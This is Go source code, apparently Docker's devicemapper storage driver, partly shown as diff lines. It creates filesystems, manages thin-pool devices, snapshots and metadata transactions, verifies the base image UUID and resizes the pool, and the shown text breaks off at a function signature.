+ exec.Command("modprobe", "xfs").Run() + + f, err := os.Open("/proc/filesystems") + if err != nil { + logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) + return false + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if strings.HasSuffix(s.Text(), "\txfs") { + return true + } + } + + if err := s.Err(); err != nil { + logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) + } + return false +} + +func determineDefaultFS() string { + if xfsSupported() { + return "xfs" + } + + logrus.Warn("devmapper: XFS is not supported in your system. Either the kernel doesn't support it or mkfs.xfs is not in your PATH. Defaulting to ext4 filesystem") + return "ext4" +} + +func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { + devname := info.DevName() + + args := []string{} + args = append(args, devices.mkfsArgs...) + + args = append(args, devname) + + if devices.filesystem == "" { + devices.filesystem = determineDefaultFS() + } + if err := devices.saveBaseDeviceFilesystem(devices.filesystem); err != nil { + return err + } + + logrus.Infof("devmapper: Creating filesystem %s on device %s", devices.filesystem, info.Name()) + defer func() { + if err != nil { + logrus.Infof("devmapper: Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err) + } else { + logrus.Infof("devmapper: Successfully created filesystem %s on device %s", devices.filesystem, info.Name()) + } + }() + + switch devices.filesystem { + case "xfs": + err = exec.Command("mkfs.xfs", args...).Run() + case "ext4": + err = exec.Command("mkfs.ext4", append([]string{"-E", "nodiscard,lazy_itable_init=0,lazy_journal_init=0"}, args...)...).Run() + if err != nil { + err = exec.Command("mkfs.ext4", append([]string{"-E", "nodiscard,lazy_itable_init=0"}, args...)...).Run() + } + if err != nil { + return err + } + err = exec.Command("tune2fs", append([]string{"-c", "-1", "-i", "0"}, devname)...).Run() + default: + err = 
fmt.Errorf("devmapper: Unsupported filesystem type %s", devices.filesystem) + } + return +} + +func (devices *DeviceSet) migrateOldMetaData() error { + // Migrate old metadata file + jsonData, err := ioutil.ReadFile(devices.oldMetadataFile()) + if err != nil && !os.IsNotExist(err) { + return err + } + + if jsonData != nil { + m := metaData{Devices: make(map[string]*devInfo)} + + if err := json.Unmarshal(jsonData, &m); err != nil { + return err + } + + for hash, info := range m.Devices { + info.Hash = hash + devices.saveMetadata(info) + } + if err := os.Rename(devices.oldMetadataFile(), devices.oldMetadataFile()+".migrated"); err != nil { + return err + } + + } + + return nil +} + +// Cleanup deleted devices. It assumes that all the devices have been +// loaded in the hash table. +func (devices *DeviceSet) cleanupDeletedDevices() error { + devices.Lock() + + // If there are no deleted devices, there is nothing to do. + if devices.nrDeletedDevices == 0 { + devices.Unlock() + return nil + } + + var deletedDevices []*devInfo + + for _, info := range devices.Devices { + if !info.Deleted { + continue + } + logrus.Debugf("devmapper: Found deleted device %s.", info.Hash) + deletedDevices = append(deletedDevices, info) + } + + // Delete the deleted devices. DeleteDevice() first takes the info lock + // and then devices.Lock(). So drop it to avoid deadlock. + devices.Unlock() + + for _, info := range deletedDevices { + // This will again try deferred deletion. + if err := devices.DeleteDevice(info.Hash, false); err != nil { + logrus.Warnf("devmapper: Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err) + } + } + + return nil +} + +func (devices *DeviceSet) countDeletedDevices() { + for _, info := range devices.Devices { + if !info.Deleted { + continue + } + devices.nrDeletedDevices++ + } +} + +func (devices *DeviceSet) startDeviceDeletionWorker() { + // Deferred deletion is not enabled. Don't do anything. 
+ if !devices.deferredDelete { + return + } + + logrus.Debug("devmapper: Worker to cleanup deleted devices started") + for range devices.deletionWorkerTicker.C { + devices.cleanupDeletedDevices() + } +} + +func (devices *DeviceSet) initMetaData() error { + devices.Lock() + defer devices.Unlock() + + if err := devices.migrateOldMetaData(); err != nil { + return err + } + + _, transactionID, _, _, _, _, err := devices.poolStatus() + if err != nil { + return err + } + + devices.TransactionID = transactionID + + if err := devices.loadDeviceFilesOnStart(); err != nil { + return fmt.Errorf("devmapper: Failed to load device files:%v", err) + } + + devices.constructDeviceIDMap() + devices.countDeletedDevices() + + if err := devices.processPendingTransaction(); err != nil { + return err + } + + // Start a goroutine to cleanup Deleted Devices + go devices.startDeviceDeletionWorker() + return nil +} + +func (devices *DeviceSet) incNextDeviceID() { + // IDs are 24bit, so wrap around + devices.NextDeviceID = (devices.NextDeviceID + 1) & maxDeviceID +} + +func (devices *DeviceSet) getNextFreeDeviceID() (int, error) { + devices.incNextDeviceID() + for i := 0; i <= maxDeviceID; i++ { + if devices.isDeviceIDFree(devices.NextDeviceID) { + devices.markDeviceIDUsed(devices.NextDeviceID) + return devices.NextDeviceID, nil + } + devices.incNextDeviceID() + } + + return 0, fmt.Errorf("devmapper: Unable to find a free device ID") +} + +func (devices *DeviceSet) poolHasFreeSpace() error { + if devices.minFreeSpacePercent == 0 { + return nil + } + + _, _, dataUsed, dataTotal, metadataUsed, metadataTotal, err := devices.poolStatus() + if err != nil { + return err + } + + minFreeData := (dataTotal * uint64(devices.minFreeSpacePercent)) / 100 + if minFreeData < 1 { + minFreeData = 1 + } + dataFree := dataTotal - dataUsed + if dataFree < minFreeData { + return fmt.Errorf("devmapper: Thin Pool has %v free data blocks which is less than minimum required %v free data blocks. 
Create more free space in thin pool or use dm.min_free_space option to change behavior", (dataTotal - dataUsed), minFreeData) + } + + minFreeMetadata := (metadataTotal * uint64(devices.minFreeSpacePercent)) / 100 + if minFreeMetadata < 1 { + minFreeMetadata = 1 + } + + metadataFree := metadataTotal - metadataUsed + if metadataFree < minFreeMetadata { + return fmt.Errorf("devmapper: Thin Pool has %v free metadata blocks which is less than minimum required %v free metadata blocks. Create more free metadata space in thin pool or use dm.min_free_space option to change behavior", (metadataTotal - metadataUsed), minFreeMetadata) + } + + return nil +} + +func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { + devices.Lock() + defer devices.Unlock() + + deviceID, err := devices.getNextFreeDeviceID() + if err != nil { + return nil, err + } + + if err := devices.openTransaction(hash, deviceID); err != nil { + logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + devices.markDeviceIDFree(deviceID) + return nil, err + } + + for { + if err := devicemapper.CreateDevice(devices.getPoolDevName(), deviceID); err != nil { + if devicemapper.DeviceIDExists(err) { + // Device ID already exists. This should not + // happen. Now we have a mechanism to find + // a free device ID. So something is not right. + // Give a warning and continue. 
+ logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + deviceID, err = devices.getNextFreeDeviceID() + if err != nil { + return nil, err + } + // Save new device id into transaction + devices.refreshTransaction(deviceID) + continue + } + logrus.Debugf("devmapper: Error creating device: %s", err) + devices.markDeviceIDFree(deviceID) + return nil, err + } + break + } + + logrus.Debugf("devmapper: Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize) + info, err := devices.registerDevice(deviceID, hash, devices.baseFsSize, devices.OpenTransactionID) + if err != nil { + _ = devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + return nil, err + } + + if err := devices.closeTransaction(); err != nil { + devices.unregisterDevice(deviceID, hash) + devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + return nil, err + } + return info, nil +} + +func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint64) error { + var ( + devinfo *devicemapper.Info + err error + ) + + if err = devices.poolHasFreeSpace(); err != nil { + return err + } + + if devices.deferredRemove { + devinfo, err = devicemapper.GetInfoWithDeferred(baseInfo.Name()) + if err != nil { + return err + } + if devinfo != nil && devinfo.DeferredRemove != 0 { + err = devices.cancelDeferredRemoval(baseInfo) + if err != nil { + // If Error is ErrEnxio. Device is probably already gone. Continue. 
+ if err != devicemapper.ErrEnxio { + return err + } + } else { + defer devices.deactivateDevice(baseInfo) + } + } + } else { + devinfo, err = devicemapper.GetInfo(baseInfo.Name()) + if err != nil { + return err + } + } + + doSuspend := devinfo != nil && devinfo.Exists != 0 + + if doSuspend { + if err = devicemapper.SuspendDevice(baseInfo.Name()); err != nil { + return err + } + defer devicemapper.ResumeDevice(baseInfo.Name()) + } + + if err = devices.createRegisterSnapDevice(hash, baseInfo, size); err != nil { + return err + } + + return nil +} + +func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInfo, size uint64) error { + deviceID, err := devices.getNextFreeDeviceID() + if err != nil { + return err + } + + if err := devices.openTransaction(hash, deviceID); err != nil { + logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + devices.markDeviceIDFree(deviceID) + return err + } + + for { + if err := devicemapper.CreateSnapDeviceRaw(devices.getPoolDevName(), deviceID, baseInfo.DeviceID); err != nil { + if devicemapper.DeviceIDExists(err) { + // Device ID already exists. This should not + // happen. Now we have a mechanism to find + // a free device ID. So something is not right. + // Give a warning and continue. 
+ logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + deviceID, err = devices.getNextFreeDeviceID() + if err != nil { + return err + } + // Save new device id into transaction + devices.refreshTransaction(deviceID) + continue + } + logrus.Debugf("devmapper: Error creating snap device: %s", err) + devices.markDeviceIDFree(deviceID) + return err + } + break + } + + if _, err := devices.registerDevice(deviceID, hash, size, devices.OpenTransactionID); err != nil { + devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + logrus.Debugf("devmapper: Error registering device: %s", err) + return err + } + + if err := devices.closeTransaction(); err != nil { + devices.unregisterDevice(deviceID, hash) + devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + return err + } + return nil +} + +func (devices *DeviceSet) loadMetadata(hash string) *devInfo { + info := &devInfo{Hash: hash, devices: devices} + + jsonData, err := ioutil.ReadFile(devices.metadataFile(info)) + if err != nil { + logrus.Debugf("devmapper: Failed to read %s with err: %v", devices.metadataFile(info), err) + return nil + } + + if err := json.Unmarshal(jsonData, &info); err != nil { + logrus.Debugf("devmapper: Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err) + return nil + } + + if info.DeviceID > maxDeviceID { + logrus.Errorf("devmapper: Ignoring Invalid DeviceId=%d", info.DeviceID) + return nil + } + + return info +} + +func getDeviceUUID(device string) (string, error) { + out, err := exec.Command("blkid", "-s", "UUID", "-o", "value", device).Output() + if err != nil { + return "", fmt.Errorf("devmapper: Failed to find uuid for device %s:%v", device, err) + } + + uuid := strings.TrimSuffix(string(out), "\n") + uuid = strings.TrimSpace(uuid) + logrus.Debugf("devmapper: UUID for device: %s is:%s", device, uuid) + return uuid, nil +} + 
// getBaseDeviceSize returns the recorded size of the base device ("" hash),
// or 0 when no base device is known.
func (devices *DeviceSet) getBaseDeviceSize() uint64 {
	info, _ := devices.lookupDevice("")
	if info == nil {
		return 0
	}
	return info.Size
}

// getBaseDeviceFS returns the filesystem recorded for the base device.
func (devices *DeviceSet) getBaseDeviceFS() string {
	return devices.BaseDeviceFilesystem
}

// verifyBaseDeviceUUIDFS activates the base device and checks that its UUID
// matches the one stored in the deviceset metadata (i.e. that we are talking
// to the same thin pool as on the previous run). It also records the base
// device's filesystem if not yet known, and falls back to it when the
// user-configured dm.fs filesystem disagrees.
func (devices *DeviceSet) verifyBaseDeviceUUIDFS(baseInfo *devInfo) error {
	devices.Lock()
	defer devices.Unlock()

	// The device must be active for blkid/probing to read it.
	if err := devices.activateDeviceIfNeeded(baseInfo, false); err != nil {
		return err
	}
	defer devices.deactivateDevice(baseInfo)

	uuid, err := getDeviceUUID(baseInfo.DevName())
	if err != nil {
		return err
	}

	if devices.BaseDeviceUUID != uuid {
		return fmt.Errorf("devmapper: Current Base Device UUID:%s does not match with stored UUID:%s. Possibly using a different thin pool than last invocation", uuid, devices.BaseDeviceUUID)
	}

	// Older metadata may predate filesystem tracking; probe and persist it.
	if devices.BaseDeviceFilesystem == "" {
		fsType, err := ProbeFsType(baseInfo.DevName())
		if err != nil {
			return err
		}
		if err := devices.saveBaseDeviceFilesystem(fsType); err != nil {
			return err
		}
	}

	// If user specified a filesystem using dm.fs option and current
	// file system of base image is not same, warn user that dm.fs
	// will be ignored.
	if devices.BaseDeviceFilesystem != devices.filesystem {
		logrus.Warnf("devmapper: Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem)
		devices.filesystem = devices.BaseDeviceFilesystem
	}
	return nil
}

// saveBaseDeviceFilesystem records fs as the base device's filesystem and
// persists the deviceset metadata.
func (devices *DeviceSet) saveBaseDeviceFilesystem(fs string) error {
	devices.BaseDeviceFilesystem = fs
	return devices.saveDeviceSetMetaData()
}

// saveBaseDeviceUUID activates the base device, reads its UUID via blkid, and
// persists it in the deviceset metadata for later verification.
func (devices *DeviceSet) saveBaseDeviceUUID(baseInfo *devInfo) error {
	devices.Lock()
	defer devices.Unlock()

	if err := devices.activateDeviceIfNeeded(baseInfo, false); err != nil {
		return err
	}
	defer devices.deactivateDevice(baseInfo)

	uuid, err := getDeviceUUID(baseInfo.DevName())
	if err != nil {
		return err
	}

	devices.BaseDeviceUUID = uuid
	return devices.saveDeviceSetMetaData()
}

// createBaseImage creates and registers the base thin device (hash ""),
// formats a filesystem on it, marks it initialized, and records its UUID.
func (devices *DeviceSet) createBaseImage() error {
	logrus.Debug("devmapper: Initializing base device-mapper thin volume")

	// Create initial device
	info, err := devices.createRegisterDevice("")
	if err != nil {
		return err
	}

	logrus.Debug("devmapper: Creating filesystem on base device-mapper thin volume")

	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
		return err
	}

	if err := devices.createFilesystem(info); err != nil {
		return err
	}

	// Only flip Initialized after the filesystem exists; roll back the flag
	// if persisting the metadata fails.
	info.Initialized = true
	if err := devices.saveMetadata(info); err != nil {
		info.Initialized = false
		return err
	}

	if err := devices.saveBaseDeviceUUID(info); err != nil {
		return fmt.Errorf("devmapper: Could not query and save base device UUID:%v", err)
	}

	return nil
}

// Returns if thin pool device exists or not. If device exists, also makes
// sure it is a thin pool device and not some other type of device.
// thinPoolExists reports whether thinPoolDevice exists in devicemapper and
// its dm target type is "thin-pool". A non-existent device yields
// (false, nil); an existing device of any other target type is an error.
func (devices *DeviceSet) thinPoolExists(thinPoolDevice string) (bool, error) {
	logrus.Debugf("devmapper: Checking for existence of the pool %s", thinPoolDevice)

	info, err := devicemapper.GetInfo(thinPoolDevice)
	if err != nil {
		return false, fmt.Errorf("devmapper: GetInfo() on device %s failed: %v", thinPoolDevice, err)
	}

	// Device does not exist.
	if info.Exists == 0 {
		return false, nil
	}

	_, _, deviceType, _, err := devicemapper.GetStatus(thinPoolDevice)
	if err != nil {
		return false, fmt.Errorf("devmapper: GetStatus() on device %s failed: %v", thinPoolDevice, err)
	}

	if deviceType != "thin-pool" {
		return false, fmt.Errorf("devmapper: Device %s is not a thin pool", thinPoolDevice)
	}

	return true, nil
}

// checkThinPool verifies that an externally supplied thin pool has never
// been used: both its used-data-block count and its transaction ID must be
// zero, otherwise we refuse to take ownership of it.
func (devices *DeviceSet) checkThinPool() error {
	_, transactionID, dataUsed, _, _, _, err := devices.poolStatus()
	if err != nil {
		return err
	}
	if dataUsed != 0 {
		return fmt.Errorf("devmapper: Unable to take ownership of thin-pool (%s) that already has used data blocks",
			devices.thinPoolDevice)
	}
	if transactionID != 0 {
		return fmt.Errorf("devmapper: Unable to take ownership of thin-pool (%s) with non-zero transaction ID",
			devices.thinPoolDevice)
	}
	return nil
}

// Base image is initialized properly. Either save UUID for the first time
// (for the upgrade case) or verify UUID.
func (devices *DeviceSet) setupVerifyBaseImageUUIDFS(baseInfo *devInfo) error {
	// If BaseDeviceUUID is empty (upgrade case), save it and return success.
	if devices.BaseDeviceUUID == "" {
		if err := devices.saveBaseDeviceUUID(baseInfo); err != nil {
			return fmt.Errorf("devmapper: Could not query and save base device UUID:%v", err)
		}
		return nil
	}

	if err := devices.verifyBaseDeviceUUIDFS(baseInfo); err != nil {
		return fmt.Errorf("devmapper: Base Device UUID and Filesystem verification failed: %v", err)
	}

	return nil
}

// checkGrowBaseDeviceFS grows the base device filesystem to
// devices.baseFsSize when the user asked for a larger base size
// (userBaseSize). Shrinking is rejected; equal sizes are a no-op.
func (devices *DeviceSet) checkGrowBaseDeviceFS(info *devInfo) error {

	if !userBaseSize {
		return nil
	}

	if devices.baseFsSize < devices.getBaseDeviceSize() {
		return fmt.Errorf("devmapper: Base device size cannot be smaller than %s", units.HumanSize(float64(devices.getBaseDeviceSize())))
	}

	if devices.baseFsSize == devices.getBaseDeviceSize() {
		return nil
	}

	// Lock ordering: per-device lock first, then the set lock —
	// matches the other mutating paths in this file (e.g. AddDevice).
	info.lock.Lock()
	defer info.lock.Unlock()

	devices.Lock()
	defer devices.Unlock()

	info.Size = devices.baseFsSize

	if err := devices.saveMetadata(info); err != nil {
		// Try to remove unused device
		delete(devices.Devices, info.Hash)
		return err
	}

	return devices.growFS(info)
}

// growFS grows the filesystem on the (already resized) thin device backing
// info: the device is activated, temporarily mounted under /run/docker/mnt,
// and grown with resize2fs (ext4) or xfs_growfs (xfs).
func (devices *DeviceSet) growFS(info *devInfo) error {
	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
		return fmt.Errorf("Error activating devmapper device: %s", err)
	}

	defer devices.deactivateDevice(info)

	fsMountPoint := "/run/docker/mnt"
	if _, err := os.Stat(fsMountPoint); os.IsNotExist(err) {
		if err := os.MkdirAll(fsMountPoint, 0700); err != nil {
			return err
		}
		// Only remove the directory if we created it.
		defer os.RemoveAll(fsMountPoint)
	}

	options := ""
	if devices.BaseDeviceFilesystem == "xfs" {
		// XFS needs nouuid or it can't mount filesystems with the same fs
		options = joinMountOptions(options, "nouuid")
	}
	options = joinMountOptions(options, devices.mountOptions)

	if err := mount.Mount(info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options); err != nil {
		return fmt.Errorf("Error mounting '%s' on '%s': %s", info.DevName(), fsMountPoint, err)
	}

	// MNT_DETACH unmounts lazily even if the grow tool still holds it busy.
	defer syscall.Unmount(fsMountPoint, syscall.MNT_DETACH)

	switch devices.BaseDeviceFilesystem {
	case "ext4":
		if out, err := exec.Command("resize2fs", info.DevName()).CombinedOutput(); err != nil {
			return fmt.Errorf("Failed to grow rootfs:%v:%s", err, string(out))
		}
	case "xfs":
		if out, err := exec.Command("xfs_growfs", info.DevName()).CombinedOutput(); err != nil {
			return fmt.Errorf("Failed to grow rootfs:%v:%s", err, string(out))
		}
	default:
		return fmt.Errorf("Unsupported filesystem type %s", devices.BaseDeviceFilesystem)
	}
	return nil
}

// setupBaseImage ensures a usable, verified base image device exists:
// reuse and verify an initialized one, otherwise delete any stale one and
// create a fresh base image (checking that a user-supplied pool is empty).
func (devices *DeviceSet) setupBaseImage() error {
	oldInfo, _ := devices.lookupDeviceWithLock("")

	// base image already exists. If it is initialized properly, do UUID
	// verification and return. Otherwise remove image and set it up
	// fresh.
	if oldInfo != nil {
		if oldInfo.Initialized && !oldInfo.Deleted {
			if err := devices.setupVerifyBaseImageUUIDFS(oldInfo); err != nil {
				return err
			}

			if err := devices.checkGrowBaseDeviceFS(oldInfo); err != nil {
				return err
			}

			return nil
		}

		logrus.Debug("devmapper: Removing uninitialized base image")
		// If previous base device is in deferred delete state,
		// that needs to be cleaned up first. So don't try
		// deferred deletion.
		if err := devices.DeleteDevice("", true); err != nil {
			return err
		}
	}

	// If we are setting up base image for the first time, make sure
	// thin pool is empty.
	if devices.thinPoolDevice != "" && oldInfo == nil {
		if err := devices.checkThinPool(); err != nil {
			return err
		}
	}

	// Create new base image device
	if err := devices.createBaseImage(); err != nil {
		return err
	}

	return nil
}

// setCloseOnExec scans /proc/self/fd and marks any fd whose symlink target
// equals name as close-on-exec. Best effort: all errors are ignored.
func setCloseOnExec(name string) {
	if fileInfos, _ := ioutil.ReadDir("/proc/self/fd"); fileInfos != nil {
		for _, i := range fileInfos {
			link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name()))
			if link == name {
				fd, err := strconv.Atoi(i.Name())
				if err == nil {
					syscall.CloseOnExec(fd)
				}
			}
		}
	}
}

// DMLog implements logging using DevMapperLogger interface.
func (devices *DeviceSet) DMLog(level int, file string, line int, dmError int, message string) {
	// By default libdm sends us all the messages including debug ones.
	// We need to filter out messages here and figure out which one
	// should be printed.
	if level > logLevel {
		return
	}

	// FIXME(vbatts) push this back into ./pkg/devicemapper/
	if level <= devicemapper.LogLevelErr {
		logrus.Errorf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
	} else if level <= devicemapper.LogLevelInfo {
		logrus.Infof("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
	} else {
		// FIXME(vbatts) push this back into ./pkg/devicemapper/
		logrus.Debugf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
	}
}

// major extracts the major number from a Linux dev_t encoding.
func major(device uint64) uint64 {
	return (device >> 8) & 0xfff
}

// minor extracts the minor number from a Linux dev_t encoding.
func minor(device uint64) uint64 {
	return (device & 0xff) | ((device >> 12) & 0xfff00)
}

// ResizePool increases the size of the pool.
// ResizePool grows the loopback-backed data file to size bytes, refreshes
// the loop device capacity and reloads the thin pool so it sees the new
// size. Shrinking is rejected.
func (devices *DeviceSet) ResizePool(size int64) error {
	dirname := devices.loopbackDir()
	datafilename := path.Join(dirname, "data")
	if len(devices.dataDevice) > 0 {
		datafilename = devices.dataDevice
	}
	metadatafilename := path.Join(dirname, "metadata")
	if len(devices.metadataDevice) > 0 {
		metadatafilename = devices.metadataDevice
	}

	// NOTE(review): the nil-checks on datafile/fi/metadatafile below stand
	// in for err checks; idiomatic Go would test err != nil.
	datafile, err := os.OpenFile(datafilename, os.O_RDWR, 0)
	if datafile == nil {
		return err
	}
	defer datafile.Close()

	fi, err := datafile.Stat()
	if fi == nil {
		return err
	}

	if fi.Size() > size {
		return fmt.Errorf("devmapper: Can't shrink file")
	}

	dataloopback := loopback.FindLoopDeviceFor(datafile)
	if dataloopback == nil {
		return fmt.Errorf("devmapper: Unable to find loopback mount for: %s", datafilename)
	}
	defer dataloopback.Close()

	metadatafile, err := os.OpenFile(metadatafilename, os.O_RDWR, 0)
	if metadatafile == nil {
		return err
	}
	defer metadatafile.Close()

	metadataloopback := loopback.FindLoopDeviceFor(metadatafile)
	if metadataloopback == nil {
		return fmt.Errorf("devmapper: Unable to find loopback mount for: %s", metadatafilename)
	}
	defer metadataloopback.Close()

	// Grow loopback file
	if err := datafile.Truncate(size); err != nil {
		return fmt.Errorf("devmapper: Unable to grow loopback file: %s", err)
	}

	// Reload size for loopback device
	if err := loopback.SetCapacity(dataloopback); err != nil {
		return fmt.Errorf("Unable to update loopback capacity: %s", err)
	}

	// Suspend the pool
	if err := devicemapper.SuspendDevice(devices.getPoolName()); err != nil {
		return fmt.Errorf("devmapper: Unable to suspend pool: %s", err)
	}

	// Reload with the new block sizes
	if err := devicemapper.ReloadPool(devices.getPoolName(), dataloopback, metadataloopback, devices.thinpBlockSize); err != nil {
		return fmt.Errorf("devmapper: Unable to reload pool: %s", err)
	}

	// Resume the pool
	if err := devicemapper.ResumeDevice(devices.getPoolName()); err != nil {
		return fmt.Errorf("devmapper: Unable to resume pool: %s", err)
	}

	return nil
}

// loadTransactionMetaData reads the on-disk open-transaction record into
// devices.transaction. A missing file means no transaction is open.
func (devices *DeviceSet) loadTransactionMetaData() error {
	jsonData, err := ioutil.ReadFile(devices.transactionMetaFile())
	if err != nil {
		// There is no active transaction. This will be the case
		// during upgrade.
		if os.IsNotExist(err) {
			devices.OpenTransactionID = devices.TransactionID
			return nil
		}
		return err
	}

	// NOTE(review): Unmarshal error is silently dropped; a corrupt
	// transaction file would go unnoticed here — confirm intent.
	json.Unmarshal(jsonData, &devices.transaction)
	return nil
}

// saveTransactionMetaData persists devices.transaction to its meta file.
func (devices *DeviceSet) saveTransactionMetaData() error {
	jsonData, err := json.Marshal(&devices.transaction)
	if err != nil {
		return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err)
	}

	return devices.writeMetaFile(jsonData, devices.transactionMetaFile())
}

// removeTransactionMetaData deletes the open-transaction record from disk.
func (devices *DeviceSet) removeTransactionMetaData() error {
	if err := os.RemoveAll(devices.transactionMetaFile()); err != nil {
		return err
	}
	return nil
}

// rollbackTransaction undoes a half-completed device creation: delete the
// dm device, remove its metadata, free its device ID and drop the
// transaction record. Individual failures are logged, not returned.
func (devices *DeviceSet) rollbackTransaction() error {
	logrus.Debugf("devmapper: Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID)

	// A device id might have already been deleted before transaction
	// closed. In that case this call will fail. Just leave a message
	// in case of failure.
	if err := devicemapper.DeleteDevice(devices.getPoolDevName(), devices.DeviceID); err != nil {
		logrus.Errorf("devmapper: Unable to delete device: %s", err)
	}

	dinfo := &devInfo{Hash: devices.DeviceIDHash}
	if err := devices.removeMetadata(dinfo); err != nil {
		logrus.Errorf("devmapper: Unable to remove metadata: %s", err)
	} else {
		devices.markDeviceIDFree(devices.DeviceID)
	}

	if err := devices.removeTransactionMetaData(); err != nil {
		logrus.Errorf("devmapper: Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err)
	}

	return nil
}

// processPendingTransaction rolls back any transaction left open by a
// previous crash, then re-synchronizes OpenTransactionID with the pool.
func (devices *DeviceSet) processPendingTransaction() error {
	if err := devices.loadTransactionMetaData(); err != nil {
		return err
	}

	// If there was open transaction but pool transaction ID is same
	// as open transaction ID, nothing to roll back.
	if devices.TransactionID == devices.OpenTransactionID {
		return nil
	}

	// If open transaction ID is less than pool transaction ID, something
	// is wrong. Bail out.
	if devices.OpenTransactionID < devices.TransactionID {
		logrus.Errorf("devmapper: Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID)
		return nil
	}

	// Pool transaction ID is not same as open transaction. There is
	// a transaction which was not completed.
	if err := devices.rollbackTransaction(); err != nil {
		return fmt.Errorf("devmapper: Rolling back open transaction failed: %s", err)
	}

	devices.OpenTransactionID = devices.TransactionID
	return nil
}

// loadDeviceSetMetaData reads the persisted DeviceSet fields from disk.
func (devices *DeviceSet) loadDeviceSetMetaData() error {
	jsonData, err := ioutil.ReadFile(devices.deviceSetMetaFile())
	if err != nil {
		// For backward compatibility return success if file does
		// not exist.
		if os.IsNotExist(err) {
			return nil
		}
		return err
	}

	return json.Unmarshal(jsonData, devices)
}

// saveDeviceSetMetaData persists the DeviceSet fields to disk.
func (devices *DeviceSet) saveDeviceSetMetaData() error {
	jsonData, err := json.Marshal(devices)
	if err != nil {
		return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err)
	}

	return devices.writeMetaFile(jsonData, devices.deviceSetMetaFile())
}

// openTransaction records (hash, DeviceID) as the in-flight device creation
// so a crash mid-creation can be rolled back on next start.
func (devices *DeviceSet) openTransaction(hash string, DeviceID int) error {
	devices.allocateTransactionID()
	devices.DeviceIDHash = hash
	devices.DeviceID = DeviceID
	if err := devices.saveTransactionMetaData(); err != nil {
		return fmt.Errorf("devmapper: Error saving transaction metadata: %s", err)
	}
	return nil
}

// refreshTransaction updates the device ID of the open transaction.
func (devices *DeviceSet) refreshTransaction(DeviceID int) error {
	devices.DeviceID = DeviceID
	if err := devices.saveTransactionMetaData(); err != nil {
		return fmt.Errorf("devmapper: Error saving transaction metadata: %s", err)
	}
	return nil
}

// closeTransaction commits the open transaction by bumping the pool's
// transaction ID to match.
func (devices *DeviceSet) closeTransaction() error {
	if err := devices.updatePoolTransactionID(); err != nil {
		logrus.Debug("devmapper: Failed to close Transaction")
		return err
	}
	return nil
}

// determineDriverCapabilities parses the dm driver version and sets
// driverDeferredRemovalSupport for versions >= 4.27.0.
func determineDriverCapabilities(version string) error {
	/*
	 * Driver version 4.27.0 and greater support deferred activation
	 * feature.
	 */

	logrus.Debugf("devicemapper: driver version is %s", version)

	// NOTE(review): indexing versionSplit[1] below panics if version has
	// no "." — presumably the kernel always reports maj.min.patch; verify.
	versionSplit := strings.Split(version, ".")
	major, err := strconv.Atoi(versionSplit[0])
	if err != nil {
		return graphdriver.ErrNotSupported
	}

	if major > 4 {
		driverDeferredRemovalSupport = true
		return nil
	}

	if major < 4 {
		return nil
	}

	minor, err := strconv.Atoi(versionSplit[1])
	if err != nil {
		return graphdriver.ErrNotSupported
	}

	/*
	 * If major is 4 and minor is 27, then there is no need to
	 * check for patch level as it can not be less than 0.
	 */
	if minor >= 27 {
		driverDeferredRemovalSupport = true
		return nil
	}

	return nil
}

// Determine the major and minor number of loopback device
func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) {
	stat, err := file.Stat()
	if err != nil {
		return 0, 0, err
	}

	dev := stat.Sys().(*syscall.Stat_t).Rdev
	majorNum := major(dev)
	minorNum := minor(dev)

	logrus.Debugf("devmapper: Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum)
	return majorNum, minorNum, nil
}

// Given a file which is backing file of a loop back device, find the
// loopback device name and its major/minor number.
func getLoopFileDeviceMajMin(filename string) (string, uint64, uint64, error) {
	file, err := os.Open(filename)
	if err != nil {
		logrus.Debugf("devmapper: Failed to open file %s", filename)
		return "", 0, 0, err
	}

	defer file.Close()
	loopbackDevice := loopback.FindLoopDeviceFor(file)
	if loopbackDevice == nil {
		return "", 0, 0, fmt.Errorf("devmapper: Unable to find loopback mount for: %s", filename)
	}
	defer loopbackDevice.Close()

	Major, Minor, err := getDeviceMajorMinor(loopbackDevice)
	if err != nil {
		return "", 0, 0, err
	}
	return loopbackDevice.Name(), Major, Minor, nil
}

// Get the major/minor numbers of thin pool data and metadata devices
func (devices *DeviceSet) getThinPoolDataMetaMajMin() (uint64, uint64, uint64, uint64, error) {
